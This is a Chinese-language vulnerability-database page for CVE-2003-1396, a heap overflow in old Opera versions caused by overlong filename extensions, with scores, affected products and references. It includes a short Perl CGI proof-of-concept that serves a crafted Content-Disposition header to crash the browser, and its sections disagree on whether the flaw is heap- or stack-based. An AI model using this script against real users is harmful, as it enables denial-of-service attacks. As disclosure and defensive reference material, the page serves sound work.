CVE-2003-1396
CVSS4.3
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:49
NMCOE    

[原文]Heap-based buffer overflow in Opera 6.05 through 7.10 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a filename with a long extension.


[CNNVD]Opera 6/7文件扩展名远程堆破坏漏洞(CNNVD-200312-195)

        
        Opera是一款多平台的WEB浏览器。
        Opera没有正确检查文件扩展名长度,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发堆破坏,造成拒绝服务。
        Opera以宽字符编码方式把文件名写入到堆缓冲区中,在写入过程中,Opera没有检查扩展名长度,就写入数据到缓冲区边界上,可导致指针覆盖,和管理堆的结构破坏(被类似"XX00XX00"任意数据写入),使Opera崩溃终止。
        根据作者分析此漏洞不能用于执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:opera_software:opera_web_browser:6.0.5::win32
cpe:/a:opera_software:opera_web_browser:6.0.1::win32
cpe:/a:opera_software:opera_web_browser:6.0.4::win32
cpe:/a:opera_software:opera_web_browser:7.0.1::win32
cpe:/a:opera_software:opera_web_browser:6.0.3::win32
cpe:/a:opera_software:opera_web_browser:6.0::win32
cpe:/a:opera_software:opera_web_browser:7.0::win32
cpe:/a:opera_software:opera_web_browser:7.0.3::win32
cpe:/a:opera_software:opera_web_browser:7.0.2::win32
cpe:/a:opera_software:opera_web_browser:6.0.2::win32
cpe:/a:opera_software:opera_web_browser:7.10

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1396
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1396
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-195
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/7450
(PATCH)  BID  7450
http://xforce.iss.net/xforce/xfdb/11894
(UNKNOWN)  XF  opera-file-extension-bo(11894)
http://archives.neohapsis.com/archives/bugtraq/2003-04/0346.html
(UNKNOWN)  BUGTRAQ  20030427 [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability in Download.

- 漏洞信息

Opera 6/7文件扩展名远程堆破坏漏洞
中危 边界条件错误
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        Opera是一款多平台的WEB浏览器。
        Opera没有正确检查文件扩展名长度,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发堆破坏,造成拒绝服务。
        Opera以宽字符编码方式把文件名写入到堆缓冲区中,在写入过程中,Opera没有检查扩展名长度,就写入数据到缓冲区边界上,可导致指针覆盖,和管理堆的结构破坏(被类似"XX00XX00"任意数据写入),使Opera崩溃终止。
        根据作者分析此漏洞不能用于执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Opera Software
        --------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.opera.com

- 漏洞信息 (22550)

Opera 6.0.x/7.0 Long File Name Remote Heap Corruption Vulnerability (EDBID:22550)
windows dos
2003-04-28 Verified
0 imagine & nesumin
N/A [点击下载]
source: http://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n"; 		

- 漏洞信息

58496
Opera Filename Extension Handling Overflow
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

Opera is prone to an overflow condition. The program fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted, long filename extension, a remote attacker can potentially execute code with the privileges of the user.

- 时间线

2003-04-27 2003-04-18
Unknow 2003-05-09

- 解决方案

Upgrade to version 7.11 or higher as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站